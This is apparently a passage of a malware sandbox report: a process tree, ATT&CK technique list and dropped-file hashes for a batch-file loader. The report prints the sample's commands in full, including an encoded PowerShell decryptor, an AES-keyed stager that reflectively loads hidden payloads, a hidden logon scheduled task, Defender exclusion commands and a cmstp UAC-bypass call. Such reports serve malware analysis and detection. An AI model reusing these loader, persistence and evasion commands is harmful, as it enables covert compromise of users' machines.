AFQATQA2AE0AUwBtADIATwBWAGIATgAvAFoAeQBUAE4AYQBvAGMARgBaAFgAQwBRAGgANQB5AFoAegBxAG4AeABLAE8AdgB1AGUAZwBNAGYAbABaAHQAWgAwAG4AQwBWAE4ATABRAGEAaABxAGsAQwA3AFMAcABrADcAWgB2AG8AaQBtAEsASABkAFQAdAB5AHYAUABsAGQAWAArAFUASwAyADEAcQA4AGIAbABJAGIANgBPAGUAYgBvAEoAMQBrAFAAMQBoAEUATQBaAEQANQA5AGIAZQBzAEgAMwB5AGIAVABFAGkAbgA5AHEANgAxAE8AVgA0ADEALwB4AGQATQA5AFEAawBkAGEAMgBmAG4AZQBCAGMAQgBEADUAQQAxAHMAVgBoAHYATQBLAHQAWQBOAG4AaABHAGoAcQB1AG8AbgBGAFEAcQB4AHAAUgBxAFIAZwAyAGEASABYAE0AUgB5AHcAbwAzADEATQBzAGwAWgBaAFIASABBAHYAMABEAHIAYwB3AGQARAByAGYAOABDADYAWABEAEgAMQBQAHcAWgBVAFMARwA3AEkAMgBTAHIAcQBBAGsAUwBFAE8ASgBPAGUASQBUAGUANABYAEoAOQBwAGcAUQBxAEMAdAB4AEMAMgBkAGUARABqAHUASQBaADkAMQBRAGQAbQBkAGgAMwArAFYASgAzAHkAKwBVADIAdQBJADgASwBPADgAMABYAEsAMgBRAFgAeABrAG0ASABIAG8ARgB1AGsANAAzAG8AdABTAEgARwBKAFgAQwA1AFoAZwBaAHYAcgA5AHkAYwArAGIARQBqAFYATwB3AFcARwBKAEcAUgBDAGIAaQBvAEUAbAAzAHcAegA4AGIAUwA4AEIATABrAHYARwBpADUAZwBHAGYAbQBMADkAbAB3AHoAUgBJAEwAVwBZAE8AbQA1AHUARwBXAHQANgBJAHoAKwBnAHcAMQArAFIAUABlADYASQBtAHgAVQBkAHcAZwBCAGcAVABoAEsAZABOADIAWQBGAEwAUgBhAGsAcgBQADcAdABEAGMANQA1AFMAbABFAHkAZABWADAAbwBaAEEAUABYADEAdABtAHAAdgB5AEIANgA0AHcATwBuADcAMABKAEUANABiAEkAQQBuADMATgBuAFgAZwBVAFcAQgBaAFIASwBjADYAbAByAHAAeABZAEwAMgA3AHkAaQBvAEYALwBPAGYAMQBIAEgAUAB0AHkAcgBWAEIANAAvAHIAZgB1AC8AUgAzAFIAMgByAGYARAAvAFQATQBvACsARgB3AFgAaABYAFMARwBqAHkATABuADcAKwBxAFcAdABaAGcAQwBJAHgAUQBIAFkAbwBiAGUAUgBDAHIAQwBBAFUAZwB4AHEAZgBJAGUAegBPAEgASQA4AGEAeABKAHMAUgBtAHQASgArAGYAMgAyAHEAMQBPAGIAagBvAFYAbABDAG8ATwA3AEgAZgBLAE0AdgBwAGkAMABaAEMAbwBzAGQANQBtAFgAKwB1AGgAbABGAGYAQwBKAFMALwBkAFYAeQBOADgAawBLACsARgAxAHAAMgBzAEcAcABCADMAWgBrAEIAYgB0AGwAWAA3AG4AeQBJAGcAQgBaAFgANgBEAEYAcgBmAEwAUQA4AFMANQA4AE0AZwBaAGsAWgBTADQAYgAwADEAOABFADQAZwA5AEMAeQByAEMAVQBvAGIAMwBhAHUAQgBMAG8AQQB5AHYANAB0AEQAWQBPAGsAOABnAGsASwB6AFUAZgA0AHQAdQBtAEUAcQByAHAAWQB4ADQAbABPAGIAdQB6AHUAMgBEAEEAOABBAG8ALwBwAEMAVwArADYAUQBaAGEAaABiAG4AUwBDAGIANABhADAAVwBVAG4AYgBJAE0AVQBlAEoAZABKAEkAeAA1AFcAOAB0ACsATQBUAHQASAB1AHUASABpAFIAawA4AGIAbwBDAEEATwBtADUAdgBXAGsATgB1AGwAeABxAC8ALwBkAFQAZgBSAFAAZwBGAEUAVQBQAHgANQBGAGgAegBKAE0AcwB1AGMAYgBhAEwANQArAFQAdABkAGwATgBxAFgAZAArAFcAMgBsAGQAUAAxADUAbwArADgAZQA0ADkATwB1ADAASwA5AG0ARwBaAHQAVwBhADcASAAwAHEAeABEAGwAMgBkAEMAZABPADgARQBBAFMATQBIAEsARABBAFUAZwA3ADkARwBNAG0AMwArAGMAVwArAHYATgBRAHoAQgBDAHcANAAwADQAWgBQADYAeQA3ADYAYwBHAGwANABrAE4AcgBHAHkAaQBrAFAANwBhACIAKQANAAoAIAAgACAAIAAkAGkAIAA9ACAAJABkAFsAMAAuAC4AMQA1AF0ADQAKACAAIAAgACAAJABlACAAPQAgACQAZABbADEANgAuAC4AKAAkAGQALgBMAGUAbgBnAHQAaAAgAC0AIAAxACkAXQANAAoAIAAgACAAIAAkAGEAZQBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMATQBhAG4AYQBnAGUAZAANAAoAIAAgACAAIAAkAGEAZQBzAC4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAA0ACgAgACAAIAAgACQAYQBlAHMALgBLAGUAeQAgAD0AIAAkAGEADQAKACAAIAAgACAAJABhAGUAcwAuAEkAVgAgAD0AIAAkAGkADQAKACAAIAAgACAAJABkAGUAYwAgAD0AIAAkAGEAZQBzAC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAApAA0ACgAgACAAIAAgACQAbwB1AHQAIAA9ACAAJABkAGUAYwAuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAGUALAAgADAALAAgACQAZQAuAEwAZQBuAGcAdABoACkADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABvAHUAdAApAA0ACgAgACAAIAAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAcgBlAHMADQAKAA== -inputFormat xml -outputFormat text
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5320
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pyrphdsg\pyrphdsg.cmdline"
        5⤵
        
        PID:5512
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFEB3.tmp" "c:\Users\Admin\AppData\Local\Temp\pyrphdsg\CSC59BD8EB9C90E4BC8984DA165F31229A8.TMP"
        6⤵
        
        PID:5552
    - - C:\windows\system32\cmstp.exe
        
        "C:\windows\system32\cmstp.exe" /au C:\windows\temp\3l1zov0y.inf
        5⤵
        
        PID:5604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
    3⤵
    PID:5312
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nVzb+ZnULdRKJ8Pt1u0INEzxzJ9SAW0T4lv8svV35z4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1TJD7feNK15qiqdG0L0ERw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FnHYa=New-Object System.IO.MemoryStream(,$param_var); $tuGjJ=New-Object System.IO.MemoryStream; $ZPygJ=New-Object System.IO.Compression.GZipStream($FnHYa, [IO.Compression.CompressionMode]::Decompress); $ZPygJ.CopyTo($tuGjJ); $ZPygJ.Dispose(); $FnHYa.Dispose(); $tuGjJ.Dispose(); $tuGjJ.ToArray();}function execute_function($param_var,$param2_var){ $PWDPu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rNYVG=$PWDPu.EntryPoint; $rNYVG.Invoke($null, $param2_var);}$mhqzu = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $mhqzu;$nhfYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($mhqzu).Split([Environment]::NewLine);foreach ($JOXWc in $nhfYw) { if ($JOXWc.StartsWith('gVggYAWWcClzlgdUqYRt')) { $eTtfZ=$JOXWc.Substring(20); break; }}$payloads_var=[string[]]$eTtfZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      4⤵
      PID:5832
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      4⤵
      Command and Scripting Interpreter: PowerShell
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5824
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_644_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_644.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:772
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_644.vbs"
        5⤵
        Checks computer location settings
        
        PID:5444
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_644.bat" "
        6⤵
        
        PID:5132
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nVzb+ZnULdRKJ8Pt1u0INEzxzJ9SAW0T4lv8svV35z4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1TJD7feNK15qiqdG0L0ERw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FnHYa=New-Object System.IO.MemoryStream(,$param_var); $tuGjJ=New-Object System.IO.MemoryStream; $ZPygJ=New-Object System.IO.Compression.GZipStream($FnHYa, [IO.Compression.CompressionMode]::Decompress); $ZPygJ.CopyTo($tuGjJ); $ZPygJ.Dispose(); $FnHYa.Dispose(); $tuGjJ.Dispose(); $tuGjJ.ToArray();}function execute_function($param_var,$param2_var){ $PWDPu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rNYVG=$PWDPu.EntryPoint; $rNYVG.Invoke($null, $param2_var);}$mhqzu = 'C:\Users\Admin\AppData\Roaming\Windows_Log_644.bat';$host.UI.RawUI.WindowTitle = $mhqzu;$nhfYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($mhqzu).Split([Environment]::NewLine);foreach ($JOXWc in $nhfYw) { if ($JOXWc.StartsWith('gVggYAWWcClzlgdUqYRt')) { $eTtfZ=$JOXWc.Substring(20); break; }}$payloads_var=[string[]]$eTtfZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        7⤵
        
        PID:2912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4152 /prefetch:1
  2⤵
  PID:5776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5784 /prefetch:1
  2⤵
  PID:5784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6228 /prefetch:1
  2⤵
  PID:6100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:1
  2⤵
  PID:6108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6388 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1328

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:320

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2044

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath 'C:\'; .('Add-MpP' + 'reference') -ExclusionProcess 'powershell.exe'
1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5936

C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5164

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
bffcefacce25cd03f3d5c9446ddb903d

SHA1
8923f84aa86db316d2f5c122fe3874bbe26f3bab

SHA256
23e7cbbf64c81122c3cb30a0933c10a320e254447771737a326ce37a0694d405

SHA512
761dae5315b35ec0b2fe68019881397f5d2eadba3963aba79a89f8953a0cd705012d7faf3a204a5f36008926b9f614980e333351596b06ce7058d744345ce2e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d22073dea53e79d9b824f27ac5e9813e

SHA1
6d8a7281241248431a1571e6ddc55798b01fa961

SHA256
86713962c3bb287964678b148ee08ea83fb83483dff8be91c8a6085ca560b2a6

SHA512
97152091ee24b6e713b8ec8123cb62511f8a7e8a6c6c3f2f6727d0a60497be28814613b476009b853575d4931e5df950e28a41afbf6707cb672206f1219c4413

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
456B

MD5
149832d3c7cc43be68fd8d312c94b3f1

SHA1
1f5ed44bb6c09ec59cd9f9bc39eda394f3b0ad67

SHA256
9bba190d1b2904003b47d341d8561e43d8f5ad5f3db0835cd4fa194ab0e13b48

SHA512
06416a216d41a7ccf3669ef19abc642c986d012349104102cf63e72d72703e789ab2c6c4f0480c854b131a5e6589ceb5d571053ab794779fa64c2ef1677173ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
0b6eb138f93886cc3fd28fcc0dfb9187

SHA1
d7f7c702d20ab5e44f91d00f43e91a50715e2dbc

SHA256
e6b70272f1f19a18f236e7d82eb8864c032badd000c05b62038bc98f1eaa5d19

SHA512
138cde80a4c2913bcc308368cd00d0f7c857c4ee07a975bf6f6112043df23eb4a562f1cae2f878bd50765fe76bb6c0b7ea023bc8b39bb4f2e620dba6774cdaa8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
ce15ca6dd5010e6e025fd047ff1e600c

SHA1
a25fe699eb22897b44872fcaa3afa03761e910b3

SHA256
e0445aa30b9f5dc87b5773dfd998640a20f935b3dd38a73ddb0692746620e3fe

SHA512
602ee387761f78058bc55871f51f079ab5e4bcbafa5e306877ec2df0d0e34f57e8c079efa19ecb1a3b4d3c3e09ae59d05acfc9c06508c992a109743bc7d870f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
375cdb4f22b98cd1d6411ca5ed2b0364

SHA1
fdeaefac148d47530875f65625457e4acce36524

SHA256
e2670a4c8d6d742f4a3cb136f0d821410e7951733eadce3e92b3847e3d02f63d

SHA512
22f0b28ef46eb4863ae55cbba15af0f8f1676c78141fd79ea14fcda7e9671a064f40558265e784c5b29aad30b9413ebbe2d103794321d2efc72095f1a0e38b1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
e20320e37f4ddf177f0829b5bf8aae50

SHA1
3d1dbb0dbe87630f2a0f6116f2ee99e835018e85

SHA256
01e6df56f773480894cf5622c25a704724b060ed5a50d4b34492ab684614e33f

SHA512
531a336596730f27e5e31b175e9e5ae63458d05fcc381558d123b5dc40a1574b0e74192d4b2b8c07f1aafbcb72663c59c41f9488e516a6842af4b0cb0bbd5bca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
7c8c1e7d0c2d281bbcd73e0dda611ae8

SHA1
acf7a855fb867b9c9abf779e4f06c01c2109c0b1

SHA256
e67383482d7b427ee64cb8b968c839c2274fedc82f98b88164bf9d85ccfa23d1

SHA512
713c981ba42143a348dd5dac768b48ffbf1fec915c016a09ec0a4e3f34aad66eeff33af21596b276c271c1cf3b2d2b6377c610223340ab5d910bbcc766d5e689

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
03c04c38639a8da564dc39bd0be4f087

SHA1
d2bee6820bc6a08c9f86a656eea3e7f68bd80b76

SHA256
63106251167bce083ee2e8a4af0c8925622d2bb370544528dec2cffc944ed0c9

SHA512
5e31459cf8342844961e6d847144cbae1d7b9ecbdd5e4a09bedadcf9dafe4829131d009cfef746f5142fdf2ee63843eb099e8733f1f0af10e4a7c540d1cb06b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\baec12cb-6f19-47a0-a235-38a42719a478.tmp

Filesize
10KB

MD5
d52d5c48f0f689fad6feab7291d86674

SHA1
a65005be0077c7214d5c221905fc85d3a910660b

SHA256
46ea864fa28a3f3fecda2fc3da3f4b413bd678850a5e5054cbe52292aa80ae8a

SHA512
9ef9471f90d71e81163b4e708a889fb1dfb6ee84b19c2064203870aab2eef78bc2048a7a467805ee119d5d3e61f301349a646594834a22a2b51cc2f9e2433b9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
005bc2ef5a9d890fb2297be6a36f01c2

SHA1
0c52adee1316c54b0bfdc510c0963196e7ebb430

SHA256
342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

SHA512
f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4abdf5877984973df7031e02dcdaa957

SHA1
600bf4203f4cd3201b0595c9bd499d93ea9ebfc4

SHA256
098b34ddc05f4a72404180784dad7fda1f2ed00d408bb76f7fa2ac924efd1cbe

SHA512
f55b463a89a5b57e68b29c7c343b305fd2221bc07a004a5a85404fe4a5d979c657afcafb8fbfaf477ed434a5703014bc7ca3928794f8bc60e243744dee54265d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
43f4bec966ab901ac034fc136a642fa5

SHA1
8e7227cefec8b05c9a79b2751d1261187b9c0422

SHA256
09ea65cf68920d08638db30c86eb3c90254b9b2d9f73246bc0176c86ce687ae4

SHA512
a65a2fe6acf4cb0dae8361af3e42e35c6bfaa93859e744a7779630d785a56bb030161c92a74b88a223769fdb912911146a762cf6a8afe33642e2695ea08ceec0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESFEB3.tmp

Filesize
1KB

MD5
326d0056022fd381257eb469b31d3887

SHA1
e91cff5fcc13bcbcd86633c854747d6d497c49eb

SHA256
748141358530e3f5fa1e6acded74c74cf285054f119b1de01f8749103655f1b7

SHA512
bd94533d7e7adcd8b2852afbc667abc337cae3730aebe2005d600582dd429053ee300980e1dfaa7a15b06e09752cf319bd7cb1b9e23211eafc247bc841e25557

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pi1leurs.ivi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\pyrphdsg\pyrphdsg.dll

Filesize
4KB

MD5
a6a1179541a3e63c74ace459838d475e

SHA1
336f077c3c12e3c9a647b0d11df770d382097651

SHA256
91ba79da4819a3702423d0b292ecf402cbe06961fac5cdef9c553cf8608649e3

SHA512
eed524e62529939f84edb1b2486bd715f7991ead79bab974f6fd806ea8070f1f8df491a93ca41d549ed8d9ad14f5d85647cfb35df20b31042aaa37fc296e8147

Download Submit
C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
70KB

MD5
b5d7889efc929af61649d13f17bf26ad

SHA1
44b1bb834ad5b3566dd4c758995bbedb2c2ba6b6

SHA256
3490b5a8d583c702b69506a047fc21135758b8dde44d77b9d102c3e4d4a4de01

SHA512
193db0b92d1595c8cfd3ecb31dd8cc2a23e3701319418a1b465bf0bc87c2708aedcd49b099bd6fe202bcca7a24f3df9bb792280abe95dce535e32f2f7ade4c3b

Download Submit
C:\Users\Admin\AppData\Roaming\Windows_Log_644.vbs

Filesize
115B

MD5
4776bd4988b4a5f9040a8ef6422f53b5

SHA1
e19fd726fd5a89300df405a81c5ca383c53875db

SHA256
b7e96a575fcedd93babeaf09e41c69dc8f4436132b74e6348af67fde70ad70ea

SHA512
38b9aa5af6826e6edb8f48fc9ffc0c4b2199c673c7ee6de89a21eed007b126275cfc91678af67377e7e48bcdfb9d3634d7ff4a914af4f0b47cc906c2837e2f80

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 81620.crdownload

Filesize
78KB

MD5
870907ad00a8f53e022f042c92727d34

SHA1
8789f00e533da9b0a8bd380b9264cfaefe8ff7bc

SHA256
6ddb80d5f672a132f45f9a0114d465aa35bb7d3b31aca5473b42a7174eb018ff

SHA512
32fbacd4338eced63990c4e0f7327fc3fc4282d497e95724445476f42acf8c1378238d345e5ba53afe86e39d860643657523b42cc5982832162e75cd7d68cde1

Download Submit
C:\windows\temp\3l1zov0y.inf

Filesize
687B

MD5
99fdcef63da22bd2d90299ebd3830493

SHA1
15c9313961d29d25938a9a1279cd484611c6f4f9

SHA256
9872a418ded853162e67f6054b17d6abdcd9f5bdac087d262a5f2604a61e797b

SHA512
fb1f13444fd6ae5b692f496481a9601de231ef542ca638c0a21653184fffe5a650c64bea35808d021ec9356808a7f0873a8e908ec2ccdbdc01a321f24e752d66

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pyrphdsg\CSC59BD8EB9C90E4BC8984DA165F31229A8.TMP

Filesize
652B

MD5
e69bc52789629b8ae5038b401acb7ab8

SHA1
66ef8afd795d5ef7a1c40102b39a6fce401f8fca

SHA256
28312fcc1a9742e89bc835fc417b84cffe2a994f3534721cbe6803433f3627b8

SHA512
6e008cd2195cf16b9642735a6022a756e129eabbbcf8a60d82617f72fcf5046b8a409d61e25b3c7be4c38d147b4af693053e6c9215efbfbb6a2d1948012059a8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pyrphdsg\pyrphdsg.0.cs

Filesize
2KB

MD5
da774b7c7335bf78596f22c13b46a80c

SHA1
43d248947111e2d943aa1c77df51fd5192e92797

SHA256
da5feb1c361cdfd307e18c753790933d18968da7a5de454a2fae3d9dd5e1fba8

SHA512
